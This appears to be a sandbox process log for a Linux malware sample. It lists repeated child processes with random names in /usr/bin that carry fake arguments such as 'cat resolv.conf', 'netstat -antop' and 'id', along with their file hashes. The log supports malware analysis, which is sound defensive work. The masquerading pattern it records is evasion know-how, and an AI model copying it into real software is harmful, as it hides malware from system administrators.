Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10489, Parent PID: 10487

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: otigswehlv PID: 10489, Parent PID: 3310

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	/usr/bin/otigswehlv sh 9446
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: otigswehlv PID: 10502, Parent PID: 10489

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: dkuidbsedp PID: 10491, Parent PID: 9446

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10493, Parent PID: 10491

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: otigswehlv PID: 10493, Parent PID: 3310

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	/usr/bin/otigswehlv "cat resolv.conf" 9446
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: otigswehlv PID: 10498, Parent PID: 10493

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: dkuidbsedp PID: 10497, Parent PID: 9446

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10499, Parent PID: 10497

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: otigswehlv PID: 10499, Parent PID: 10497

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	/usr/bin/otigswehlv "netstat -antop" 9446
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: otigswehlv PID: 10503, Parent PID: 10499

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: dkuidbsedp PID: 10538, Parent PID: 9446

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10539, Parent PID: 10538

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thzryslebl PID: 10539, Parent PID: 3310

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	/usr/bin/thzryslebl gnome-terminal 9446
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: thzryslebl PID: 10541, Parent PID: 10539

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: dkuidbsedp PID: 10540, Parent PID: 9446

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10542, Parent PID: 10540

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thzryslebl PID: 10542, Parent PID: 10540

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	/usr/bin/thzryslebl "cat resolv.conf" 9446
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: thzryslebl PID: 10551, Parent PID: 10542

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: dkuidbsedp PID: 10544, Parent PID: 9446

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10547, Parent PID: 10544

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thzryslebl PID: 10547, Parent PID: 3310

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	/usr/bin/thzryslebl sh 9446
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: thzryslebl PID: 10560, Parent PID: 10547

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: dkuidbsedp PID: 10549, Parent PID: 9446

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10553, Parent PID: 10549

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thzryslebl PID: 10553, Parent PID: 3310

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	/usr/bin/thzryslebl id 9446
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: thzryslebl PID: 10569, Parent PID: 10553

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: dkuidbsedp PID: 10556, Parent PID: 9446

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10561, Parent PID: 10556

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thzryslebl PID: 10561, Parent PID: 10556

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	/usr/bin/thzryslebl "echo \"find\"" 9446
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: thzryslebl PID: 10574, Parent PID: 10561

General

Start time:	09:49:59
Start date:	27/07/2022
Path:	/usr/bin/thzryslebl
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	e3cb568f026ace3642e8e03b7d58acfa

Chronological Activities

Analysis Process: dkuidbsedp PID: 10595, Parent PID: 9446

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10596, Parent PID: 10595

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: sunvkgnszw PID: 10596, Parent PID: 3310

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	/usr/bin/sunvkgnszw "ifconfig eth0" 9446
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: sunvkgnszw PID: 10603, Parent PID: 10596

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: dkuidbsedp PID: 10597, Parent PID: 9446

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10599, Parent PID: 10597

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: sunvkgnszw PID: 10599, Parent PID: 3310

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	/usr/bin/sunvkgnszw "cd /etc" 9446
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: sunvkgnszw PID: 10609, Parent PID: 10599

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: dkuidbsedp PID: 10600, Parent PID: 9446

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10604, Parent PID: 10600

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: sunvkgnszw PID: 10604, Parent PID: 3310

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	/usr/bin/sunvkgnszw uptime 9446
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: sunvkgnszw PID: 10617, Parent PID: 10604

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: dkuidbsedp PID: 10606, Parent PID: 9446

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10608, Parent PID: 10606

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: sunvkgnszw PID: 10608, Parent PID: 3310

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	/usr/bin/sunvkgnszw "ls -la" 9446
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: sunvkgnszw PID: 10615, Parent PID: 10608

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: dkuidbsedp PID: 10611, Parent PID: 9446

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10614, Parent PID: 10611

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: sunvkgnszw PID: 10614, Parent PID: 3310

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	/usr/bin/sunvkgnszw id 9446
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: sunvkgnszw PID: 10620, Parent PID: 10614

General

Start time:	09:50:04
Start date:	27/07/2022
Path:	/usr/bin/sunvkgnszw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	3c729bbc723a5ec2053509a8a7b8f520

Chronological Activities

Analysis Process: dkuidbsedp PID: 10650, Parent PID: 9446

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10651, Parent PID: 10650

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yclsxhkbli PID: 10651, Parent PID: 3310

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	/usr/bin/yclsxhkbli pwd 9446
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: yclsxhkbli PID: 10656, Parent PID: 10651

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: dkuidbsedp PID: 10652, Parent PID: 9446

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10654, Parent PID: 10652

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yclsxhkbli PID: 10654, Parent PID: 3310

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	/usr/bin/yclsxhkbli "route -n" 9446
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: yclsxhkbli PID: 10663, Parent PID: 10654

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: dkuidbsedp PID: 10655, Parent PID: 9446

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10659, Parent PID: 10655

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yclsxhkbli PID: 10659, Parent PID: 3310

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	/usr/bin/yclsxhkbli "route -n" 9446
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: yclsxhkbli PID: 10670, Parent PID: 10659

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: dkuidbsedp PID: 10661, Parent PID: 9446

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10665, Parent PID: 10661

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yclsxhkbli PID: 10665, Parent PID: 3310

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	/usr/bin/yclsxhkbli uptime 9446
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: yclsxhkbli PID: 10677, Parent PID: 10665

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: dkuidbsedp PID: 10668, Parent PID: 9446

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10672, Parent PID: 10668

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yclsxhkbli PID: 10672, Parent PID: 3310

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	/usr/bin/yclsxhkbli "cat resolv.conf" 9446
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: yclsxhkbli PID: 10675, Parent PID: 10672

General

Start time:	09:50:09
Start date:	27/07/2022
Path:	/usr/bin/yclsxhkbli
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	595277e5113341b08e8774d7eff08b83

Chronological Activities

Analysis Process: dkuidbsedp PID: 10705, Parent PID: 9446

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10706, Parent PID: 10705

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10706, Parent PID: 3310

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	/usr/bin/nvlkgshfzs uptime 9446
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10710, Parent PID: 10706

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: dkuidbsedp PID: 10707, Parent PID: 9446

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10708, Parent PID: 10707

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10708, Parent PID: 3310

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	/usr/bin/nvlkgshfzs su 9446
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10716, Parent PID: 10708

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: dkuidbsedp PID: 10709, Parent PID: 9446

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10711, Parent PID: 10709

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10711, Parent PID: 3310

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	/usr/bin/nvlkgshfzs "netstat -an" 9446
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10722, Parent PID: 10711

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: dkuidbsedp PID: 10712, Parent PID: 9446

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10714, Parent PID: 10712

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10714, Parent PID: 3310

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	/usr/bin/nvlkgshfzs "echo \"find\"" 9446
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10720, Parent PID: 10714

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: dkuidbsedp PID: 10715, Parent PID: 9446

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10718, Parent PID: 10715

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10718, Parent PID: 3310

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	/usr/bin/nvlkgshfzs "ifconfig eth0" 9446
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: nvlkgshfzs PID: 10728, Parent PID: 10718

General

Start time:	09:50:14
Start date:	27/07/2022
Path:	/usr/bin/nvlkgshfzs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a99f637c7edead59c4587f692d6b428

Chronological Activities

Analysis Process: dkuidbsedp PID: 10760, Parent PID: 9446

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10761, Parent PID: 10760

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10761, Parent PID: 3310

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	/usr/bin/wgerzwaeqg whoami 9446
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10763, Parent PID: 10761

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: dkuidbsedp PID: 10762, Parent PID: 9446

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10764, Parent PID: 10762

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10764, Parent PID: 10762

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	/usr/bin/wgerzwaeqg "route -n" 9446
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10765, Parent PID: 10764

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: dkuidbsedp PID: 10766, Parent PID: 9446

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10767, Parent PID: 10766

General

Start time:	09:50:19
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10767, Parent PID: 3310

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	/usr/bin/wgerzwaeqg ls 9446
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10770, Parent PID: 10767

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: dkuidbsedp PID: 10769, Parent PID: 9446

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10772, Parent PID: 10769

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10772, Parent PID: 3310

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	/usr/bin/wgerzwaeqg uptime 9446
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10779, Parent PID: 10772

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: dkuidbsedp PID: 10775, Parent PID: 9446

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10777, Parent PID: 10775

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
